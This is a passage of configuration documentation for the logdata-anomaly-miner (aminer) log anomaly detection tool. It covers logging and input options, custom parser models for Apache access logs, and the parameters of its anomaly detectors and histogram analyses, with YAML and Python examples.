code-block:: yaml Log.Encoding: 'utf-8' Log.StatisticsPeriod ~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 3600 Defines how often to write into stat-logfiles. .. code-block:: yaml Log.StatisticsPeriod: 3600 Log.StatisticsLevel ~~~~~~~~~~~~~~~~~~~ * Type: Number of loglevel * Default: 1 Defines the loglevel for the stat logs. .. code-block:: yaml Log.StatisticsLevel: 2 Log.DebugLevel ~~~~~~~~~~~~~~ * Type: Number of loglevel * Default: 1 Defines the loglevel of the aminer debug-logfile. .. code-block:: yaml Log.DebugLevel: 2 Log.RemoteControlLogFile ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/aminerRemoteLog.log' Defines the path of the logfile for the RemoteControl. .. code-block:: yaml Log.RemoteControlLogFile: '/var/log/aminerremotecontrol.log' Log.StatisticsFile ~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/statistics.log' Defines the path of the stats-file. .. code-block:: yaml Log.StatisticsFile: '/var/log/aminer-stats.log' Log.DebugFile ~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/aminer.log' Defines the path of the debug-log-file. .. code-block:: yaml Log.DebugFile: '/var/log/aminer.log' Log.Rotation.MaxBytes ~~~~~~~~~~~~~~~~~~~~~ * Type: number of bytes * Default: 1048576 (1 Megabyte) Defines the number of bytes before "Log.RemoteControlLogFile", "Log.StatisticsFile" and "Log.DebugFile" is rotated. .. code-block:: yaml Log.Rotation.MaxBytes: 1048576 Log.Rotation.BackupCount ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: number of old logfiles * Default: 5 Defines the number of logfiles saved after rotation of "Log.RemoteControlLogFile", "Log.StatisticsFile" and "Log.DebugFile". .. code-block:: yaml Log.Rotation.BackupCount: 5 ----- Input ----- timestamp_paths ~~~~~~~~~~~~~~~ * Type: string or list of strings Parser paths to DateTimeModelElements to set timestamp of log events. .. 
code-block:: yaml timestamp_paths: '/model/time' .. code-block:: yaml timestamp_paths: - '/parser/model/time' - '/parser/model/type/execve/time' - '/parser/model/type/proctitle/time' - '/parser/model/type/syscall/time' - '/parser/model/type/path/time' multi_source ~~~~~~~~~~~~ * Type: boolean (True,False) * Default: False Flag to enable chronologically correct parsing from multiple input-logfiles. .. code-block:: yaml multi_source: True eol_sep ~~~~~~~ * Default: '\n' End of Line seperator for events. .. note:: Enables parsing of multiline logs. .. code-block:: yaml eol_sep: '\r\n' json_format ~~~~~~~~~~~ * Type: boolean (True,False) * Default: False Enables parsing of logs in json-format. .. code-block:: yaml json_format: True suppress_unparsed ~~~~~~~~~~~~~~~~~ * Default: False Boolean value that allows to suppress anomaly output about unparsed log atoms. .. code-block:: yaml suppress_unparsed: True ------- Parsing ------- There are some predefined standard-model-elements like *IpAddressDataModelElement*, *DateTimeModelElement*, *FixedDataModelElement* and so on. They are located in the python-source-tree of logdata-anomaly-miner. A comprehensive list of all possible standard-model-elements can be found below. Using these standard-model-elements it is possible to create custom parser models. Currently there are two methods of doing it: 1. Using a python-script that is located in */etc/aminer/conf-enabled*: .. 
code-block:: python """ /etc/aminer/conf-enabled/ApacheAccessParsingModel.py""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Apache Access logs from the AIT-LDS.""" alphabet = b'!"#$%&\'()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]' model = SequenceModelElement('model', [ FirstMatchModelElement('client_ip', [ IpAddressDataModelElement('client_ip'), FixedDataModelElement('localhost', b'::1') ]), FixedDataModelElement('sp1', b' '), VariableByteDataModelElement('client_id', alphabet), FixedDataModelElement('sp2', b' '), VariableByteDataModelElement('user_id', alphabet), FixedDataModelElement('sp3', b' ['), DateTimeModelElement('time', b'%d/%b/%Y:%H:%M:%S'), FixedDataModelElement('sp4', b' +'), DecimalIntegerValueModelElement('tz'), FixedDataModelElement('sp5', b'] "'), FirstMatchModelElement('fm', [ FixedDataModelElement('dash', b'-'), SequenceModelElement('request', [ FixedWordlistDataModelElement('method', [ b'GET', b'POST', b'PUT', b'HEAD', b'DELETE', b'CONNECT', b'OPTIONS', b'TRACE', b'PATCH']), FixedDataModelElement('sp6', b' '), DelimitedDataModelElement('request', b' ', b'\\'), FixedDataModelElement('sp7', b' '), DelimitedDataModelElement('version', 
b'"'), ]) ]), FixedDataModelElement('sp8', b'" '), DecimalIntegerValueModelElement('status_code'), FixedDataModelElement('sp9', b' '), DecimalIntegerValueModelElement('content_size'), OptionalMatchModelElement( 'combined', SequenceModelElement('combined', [ FixedDataModelElement('sp10', b' "'), DelimitedDataModelElement('referer', b'"', b'\\'), FixedDataModelElement('sp11', b'" "'), DelimitedDataModelElement('user_agent', b'"', b'\\'), FixedDataModelElement('sp12', b'"'), ])), ]) return model This parser can be used as "type" in **/etc/aminer/config.yml**: .. code-block:: yaml Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' .. warning:: Please do not create files with the ending "ModelElement.py" in /etc/aminer/conf-enabled! 2. Configuring the parser-model inline in **/etc/aminer/config.yml** .. code-block:: yaml Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: identity_model type: VariableByteDataModelElement name: 'ident' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: user_name_model type: VariableByteDataModelElement name: 'user' args: '0123456789abcdefghijklmnopqrstuvwxyz.-' - id: new_time_model type: DateTimeModelElement name: 'time' date_format: '[%d/%b/%Y:%H:%M:%S +0000]' - id: sq3 type: FixedDataModelElement name: 'sq3' args: ' "' - id: request_method_model type: FixedWordlistDataModelElement name: 'method' args: - 'GET' - 'POST' - 'PUT' - 'HEAD' - 'DELETE' - 'CONNECT' - 'OPTIONS' - 'TRACE' - 'PATCH' - id: request_model type: VariableByteDataModelElement name: 'request' args: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-/()[]{}!$%&=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]()^_`abcdefghijklmnopqrstuvwxyz{|}~' - id: timestamp_model type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S+00:00' - id: optional_model type: OptionalMatchModelElement name: 'opt' args: timestamp_model - id: 'START' start: True type: 
JsonStringModelElement name: accesslog strict: True ignore_null: False key_parser_dict: "time": optional_model "agent": agent .. warning:: This parser does not work with multiline json-logs .. note:: Use OptionalMatchModelElement to make the subparser optional with null-values OptionalMatchModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~ This model allows to define optional model elements. * **args**: the id of the optional element that will be skipped if it does not match .. code-block:: yaml Parser: - id: user type: FixedDataModelElement name: 'User' args: 'User ' - id: opt type: OptionalMatchModelElement name: 'opt' args: user RepeatedElementDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model allows to define elements that repeat a number of times. * **args**: a string or list containing the following parameters: 1. repeated_element: id of element which is repeated 2. min_repeat: minimum amount of times the repeated element has to occur, default is 1 3. max_repeat: minimum amount of times the repeated element has to occur, default is 1048576 .. code-block:: yaml Parser: - id: delimitedDataModelElement type: DelimitedDataModelElement name: 'DelimitedDataModelElement' consume_delimiter: True delimiter: ';' - id: repeatedElementDataModelElement type: RepeatedElementDataModelElement name: 'RepeatedElementDataModelElement' args: - sequenceModelElement - 3 SequenceModelElement ~~~~~~~~~~~~~~~~~~~~ This model defines a sequence of elements that all have to match. * **args**: a list of elements that form the sequence .. 
code-block:: yaml Parser: - id: user type: FixedDataModelElement name: 'User' args: 'User ' - id: username type: DelimitedDataModelElement name: 'Username' consume_delimiter: True delimiter: ' ' - id: ip type: IpAddressDataModelElement name: 'IP' - id: seq type: SequenceModelElement name: 'seq' args: - user - username - ip VariableByteDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model defines a string of character bytes with variable length from a given alphabet. * **args**: string specifying the allowed characters .. code-block:: yaml Parser: - id: version type: VariableByteDataModelElement name: 'version' args: '0123456789.' WhiteSpaceLimitedDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model defines a string that is delimited by a white space. .. code-block:: yaml Parser: - id: whiteSpaceLimitedDataModelElement type: WhiteSpaceLimitedDataModelElement name: 'WhiteSpaceLimitedDataModelElement' XmlModelElement ~~~~~~~~~~~~~~~~ This model defines a xml-formatted log line. This model is usually used as a start element and with xml_format: True set in the Input section of the config.yml. * **key_parser_dict**: a dictionary of keys as defined in the xml-formatted logs and appropriate parser models as values * **attribute_prefix**: a string that marks the element as an attribute of an element in the xml schema. Default: "+" * **optional_attribute_prefix**: a string that can be used as a prefix for attributes that are optional in the xml schema. Default: "_" * **empty_allowed_prefix**: a string that can be used as a prefix for elements where empty values are allowed in the xml schema. Default: "?" * **xml_header_expected**: defines whether a xml-header is expected. Default: False .. 
code-block:: yaml Parser: - id: id type: DecimalIntegerValueModelElement name: 'id' - id: opt type: FixedDataModelElement name: 'opt' args: 'text' - id: to type: AnyByteDataModelElement name: 'to' - id: from type: AnyByteDataModelElement name: 'from' - id: heading type: AnyByteDataModelElement name: 'heading' - id: text1 type: AnyByteDataModelElement name: 'text1' - id: text2 type: AnyByteDataModelElement name: 'text2' - id: xml start: True type: XmlModelElement name: 'model' xml_header_expected: True key_parser_dict: messages: - note: +id: id _+opt: opt to: to from: from ?heading: heading body: text1: text1 text2: text2 --------- Analysing --------- All detectors have the following parameters and may have additional specific parameters that are defined in the respective sections. * **id**: must be a unique string * **type**: must be an existing Analysis component (required) .. _AllowlistViolationDetector: AllowlistViolationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for log atoms not matching any allowlisted rule. * **allowlist_rules**: list of rules executed in same way as inside Rules.OrMatchRule.list of rules executed in same way as inside Rules.OrMatchRule (required, list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). .. 
code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" - type: OrMatchRule id: or_match_rule sub_rules: - "path_exists_match_rule1" - "value_match_rule" - type: AllowlistViolationDetector id: Allowlist allowlist_rules: - "or_match_rule" .. seealso:: :ref:`MatchRules` CharsetDetector ~~~~~~~~~~~~~~~ This detector generates anomalies for new characters in parsed elements and extends the allowed alphabet when learning is active. * **paths** parser paths of values to be analyzed; multiple paths mean that all values occurring in these paths are considered for character detection (required, list of strings). * **id_path_list** list of strings that specify group identifiers for which alphabets should be learned (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether value ranges should be extended when values outside of ranges are observed (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. 
code-block:: yaml Analysis: - type: 'CharsetDetector' paths: - '/parser/value' learn_mode: True EnhancedNewMatchPathValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In addition to detecting new value combination (see NewMatchPathValueComboDetector), this detector also stores combo occurrence times and amounts, and allows to execute functions on tuples that need to be defined in the python code first. * **paths**: the list of values to extract from each match to create the value combination to be checked (required, list of strings). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, defaults to False). * **tuple_transformation_function**: when not None, this function will be invoked on each extracted value combination list to transform it. It may modify the list directly or create a new one to return it (string, defaults to None). * **learn_mode**: when set to True, this detector will report a new value only the first time before including it in the known values set automatically (boolean). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). .. 
code-block:: yaml Analysis: - type: EnhancedNewMatchPathValueComboDetector id: EnhancedNewValueCombo paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" tuple_transformation_function: "demo" learn_mode: True EntropyDetector ~~~~~~~~~~~~~~ This detector monitors and learns occurrence probabilities of character pairs in values. Many unlikely character pairs in values suggest that they are randomly generated or not fitting the learned character patterns. * **paths** parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered as if they occur in the same field (required, list of strings). * **prob_thresh** limit for the average probability of character pairs for which anomalies are reported (float, defaults to 0.05). * **default_probs** initializes the probabilities with default values from https://github.com/markbaggett/freq (boolean, defaults to False). * **skip_repetitions** boolean that determines whether only distinct values are used for character pair counting. This counteracts the problem of imbalanced word frequencies that distort the frequency table generated in a single aminer run (boolean, defaults to False). * **persistence_id** name of persistency document (string, defaults to "Default"). * **learn_mode** when set to True, the detector will extend the table of character pair frequencies based on new values (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. 
code-block:: yaml Analysis: - type: 'EntropyDetector' paths: - '/parser/value' prob_thresh: 0.05 default_freqs: false skip_repetitions: false learn_mode: True EventCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~~ This module defines an evaluator and generator for event rules. The overall idea of generation is 1. For each processed event A, randomly select another event B occurring within queue_delta_time. 2. If B chronologically occurs after A, create the hypothesis A => B (observing event A implies that event B must be observed within current_time+queue_delta_time). If B chronologically occurs before A, create the hypothesis B <= A (observing event A implies that event B must be observed within currentTime-queueDeltaTime). 3. Observe for a long time (max_observations) whether the hypothesis holds. 4. If the hypothesis holds, transform it to a rule. Otherwise, discard the hypothesis. * **paths**: a list of paths where values or value combinations used for correlation occur. If this parameter is not set, correlation is done on event types instead (list of strings, defaults to empty list). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **max_hypotheses** maximum amount of hypotheses and rules hold in memory (integer, defaults to 1000). * **hypothesis_max_delta_time** time span in seconds of events considered for hypothesis generation (float, defaults to 5.0). * **generation_probability** probability in [0, 1] that currently processed log line is considered for hypothesis with each of the candidates (float, defaults to 1.0). * **generation_factor** likelihood in [0, 1] that currently processed log line is added to the set of candidates for hypothesis generation (float, defaults to 1.0). * **max_observations** maximum amount of evaluations before hypothesis is transformed into a rule or discarded or rule is evaluated (integer, defaults to 500). 
* **p0** expected value for hypothesis evaluation distribution (float, defaults to 0.9). * **alpha** confidence value for hypothesis evaluation (float, defaults to 0.05). * **candidates_size** maximum number of stored candidates used for hypothesis generation (integer, defaults to 10). * **hypotheses_eval_delta_time** duration in seconds between hypothesis evaluation phases that remove old hypotheses that are likely to remain unused (float, 120.0). * **delta_time_to_discard_hypothesis** time span in seconds required for old hypotheses to be discarded (float, defaults to 180.0). * **check_rules_flag** specifies whether existing rules are evaluated (boolean, defaults to True). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **learn_mode**: specifies whether new hypotheses and rules are generated (boolean). .. code-block:: yaml Analysis: - type: EventCorrelationDetector id: EventCorrelationDetector check_rules_flag: True hypothesis_max_delta_time: 1.0 learn_mode: True EventCountClusterDetector ~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector that clusters count vectors of event and value occurrences. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. 
When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **id_path_list** parser paths of values for which separate count vectors should be generated (list of strings, defaults to empty list). * **num_windows** the number of vectors stored in the models (integer, defaults to 50). * **confidence_factor** minimum similarity threshold in range [0, 1] for detection (float, defaults to 0.33). * **idf** when true, value counts are weighted higher when they occur with fewer id_paths (requires that id_path_list is set) (boolean, defaults to False). * **norm** when true, count vectors are normalized so that only relative occurrence frequencies matter for detection (boolean, defaults to False). * **add_normal** when true, count vectors are also added to the model when they exceed the similarity threshold (boolean, defaults to False). * **check_empty_windows** when true, empty count vectors are generated for time windows without event occurrences (boolean, defaults to False). * **persistence_id** name of persistence document (string, defaults to "Default"). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list list** of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **stop_learning_time** switch the learn_mode to False after the time (float, defaults to None). 
* **stop_learning_no_anomaly_time** switch the learn_mode to False after no anomaly was detected for that time (float, defaults to None). .. code-block:: yaml Analysis: - id: "eccd" type: "EventCountClusterDetector" window_size: 10 idf: True confidence_factor: 0.7 id_path_list: - '/parser/idp' paths: - '/parser/val' EventFrequencyDetector ~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for event and value frequency deviations. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **scoring_path_list** parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. * **unique_path_list** parser paths of values where only unique value occurrences should be counted for every value occurring at paths. * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **num_windows** the number of previous time windows considered for expected frequency estimation (integer, defaults to 50). * **confidence_factor** defines range of tolerable deviation of measured frequency from expected frequency according to occurrences_mean +- occurrences_std / self.confidence_factor. Default value is 0.33 = 3 * sigma deviation. confidence_factor must be in range [0, 1] (float, defaults to 0.33). * **empty_window_warnings** whether anomalies should be generated for too small window sizes. * **early_exceeding_anomaly_output** states if a anomaly should be raised the first time the appearance count exceedes the range. * **set_lower_limit** sets the lower limit of the frequency test to the specified value. 
* **set_upper_limit** sets the upper limit of the frequency test to the specified value. * **season** the seasonality/periodicity of the time-series in seconds. * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: EventFrequencyDetector id: EventFrequencyDetector window_size: 10 EventSequenceDetector ~~~~~~~~~~~~~~~~~~~~~ This module defines an detector for event and value sequences. The concept is based on STIDE which was first published by Forrest et al. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **id_path_list** one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). * **seq_len** the length of the sequences to be learned (larger lengths increase precision, but may overfit the data). (integer, defaults to 3). 
* **learn_mode** specifies whether newly observed sequences should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: EventSequenceDetector id: EventSequenceDetector seq_len: 4 paths: - '/model/type/syscall/syscall' id_path_list: - '/model/type/syscall/id' EventTypeDetector ~~~~~~~~~~~~~~~~~ This component serves as a basis for the VariableTypeDetector, VariableCorrelationDetector, TSAArimaDetector and PathArimaDetector. It saves a list of the values to the single paths and tracks the time for the TSAArimaDetector. * **paths** parser paths of values to be analyzed (list of strings, defaults to empty list). * **id_path_list** one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). * **allow_missing_id** specifies whether log atoms without id path should be omitted (boolean, defaults to False. only if id path is set). * **allowed_id_tuples** list of the allowed id tuples. Log atoms with id tuples not in this list are not analyzed, when this list is not empty. * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). 
* **max_num_vals** maximum number of lines in the value list before it is reduced (integer, defaults to 1500). * **min_num_vals** number of the values which the list is being reduced to (integer, defaults to 1000). * **save_values** if False the values of the paths are not saved for further analysis. The values are not needed for the TSAArimaDetector (boolean, defaults to True). .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD id_path_list: - '/model/type/syscall/id' allow_missing_id: True save_values: False .. _HistogramAnalysis: HistogramAnalysis ~~~~~~~~~~~~~~~~~ This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", which calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of the same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * **histogram_defs**: list of tuples. The first element of the tuple contains the target property path to analyze. The second element contains the id of a bin_definition (LinearNumericBinDefinition or ModuloTimeBinDefinition). List(strings) **Required** * **report_interval**: Report_interval delay in seconds between creation of two reports. The parameter is applied to the parsed record data time, not the system time. Hence reports can be delayed when no data is received. Integer(min: 1) **Required** * **reset_after_report_flag**: Zero counters after the report was sent. Boolean(Default: true) * **persistence_id**: the name of the file where the learned models are stored. 
String(Default: 'Default') * **output_logline**: specifies whether the full parsed log atom should be provided in the output. Boolean(Default: false) * **output_event_handlers**: List of event-handler-id to send the report to. List(strings) * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. Boolean(Default: false) .. code-block:: yaml Analysis: - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True - type: HistogramAnalysis id: HistogramAnalysis histogram_defs: [["/model/RandomTime/Random", "linear_numeric_bin_definition"]] report_interval: 10 .. _PathDependentHistogramAnalysis: PathDependentHistogramAnalysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates a histogram for only a single input property, e.g. an IP address, but for each group of correlated match paths. Assume there are two paths that include the input property but separate after the property was found on the path. This might be for example the client IP address in ssh log atoms, where the parsing path may split depending on whether this was a log atom for a successful login, logout or some error. This analysis component will then create separate histograms, one for the path common to all atoms and one for each disjunct part of the subpaths found. The component uses the same binning functions as the standard HistogramAnalysis.HistogramAnalysis, see documentation there. * **path**: The property-path. String(Required) * **bin_definition**: The id of a bin_definition (LinearNumericBinDefinition or ModuloTimeBinDefinition). String(Required) * **report_interval**: Report_interval delay in seconds between creation of two reports. The parameter is applied to the parsed record data time, not the system time. Hence reports can be delayed when no data is received. Integer(min: 1) * **reset_after_report_flag**: Zero counters after the report was sent. 
Boolean(Default: true) * **persistence_id**: the name of the file where the learned models are stored. String(Default: 'Default') * **output_logline**: specifies whether the full parsed log atom should be provided in the output. Boolean(Default: false) * **output_event_handlers**: List of event-handler-id to send the report to. List(strings) * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. Boolean(Default: false) .. code-block:: yaml Analysis: - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True - type: PathDependentHistogramAnalysis id: PathDependentHistogramAnalysis path: "/model/RandomTime" bin_definition: "modulo_time_bin_definition" report_interval: 10 LinearNumericBinDefinition ~~~~~~~~~~~~~~~~~~~~~~~~~~ Binning function working on numeric values and sorting them into bins of the same size. * **lower_limit**: Start of the lowest bin. Integer or Float **Required** * **bin_size**: Size of a bin in reporting units. Integer(min 1) **Required** * **bin_count**: Number of bins. Integer(min 1) **Required** * **outlier_bins_flag**: Disable outlier bins. Boolean. Default: False * **output_event_handlers**: List of handlers to send the report to. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True .. seealso:: :ref:`HistogramAnalysis` ModuloTimeBinDefinition ~~~~~~~~~~~~~~~~~~~~~~~ Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * **modulo_value**: Modulo value in seconds. * **time_unit**: Division factor to get down to the reporting unit. * **lower_limit**: Start of the lowest bin. 
Integer or Float **Required** * **bin_size**: Size of a bin in reporting units. Integer(min 1) **Required** * **bin_count**: Number of bins. Integer(min 1) **Required** * **outlier_bins_flag**: Disable outlier bins. Boolean. Default: False * **output_event_handlers**: List of handlers to send the report to. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True .. seealso:: :ref:`PathDependentHistogramAnalysis` MatchFilter ~~~~~~~~~~~ This component creates events for specified paths and values. * **paths**: List of paths defined as strings (Required) * **value_list**: List of values (Required) * **output_logline**: Defines if the logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with ids of the event_handlers * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchFilter id: MatchFilter paths: - "/model/Random" value_list: - 1 - 10 - 100 MatchValueAverageChangeDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector calculates the average of a given list of values to monitor. Reports are generated if the average of the latest values diverges significantly from the values observed before. * **timestamp_path**: Use this path value for timestamp based bins. String (**required**) * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **min_bin_elements**: Evaluate the latest bin only after at least that number of elements was added to it. Integer, min: 1 (**required**) * **min_bin_time**: Evaluate the latest bin only when the first element is received after min_bin_time has elapsed. 
Integer, min: 1 (**required**) * **avg_factor** the maximum allowed deviation for the average value before an anomaly is raised. Float, default: 1 * **var_factor** the maximum allowed deviation for the variance of the value before an anomaly is raised. Float, default: 2 * **debug_mode**: Enables debug output. Boolean(Default: False) * **persistence_id**: The name of the file where the learned models are stored. String * **output_logline**: Defines if the logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with ids of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchValueAverageChangeDetector id: MatchValueAverageChange timestamp_path: None paths: - "/model/Random" min_bin_elements: 100 min_bin_time: 10 MatchValueStreamWriter ~~~~~~~~~~~~~~~~~~~~~~ This component extracts values from a given match and writes them to a stream. This can be used to forward these values to another program (when the stream is a wrapped network socket) or to a file for further analysis. A stream is used instead of a file descriptor to increase performance. To flush it from time to time, add the writer object also to the time trigger list. * **stream**: Stream to write the value of the match to. Possible values: 'sys.stdout' or 'sys.stderr' ( **required**) * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **separator**: Use this string as a separator for the output. String ( **required**) * **missing_value_string**: Write this string if the value is missing. ( **required**) * **output_event_handlers**: List of strings with ids of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. 
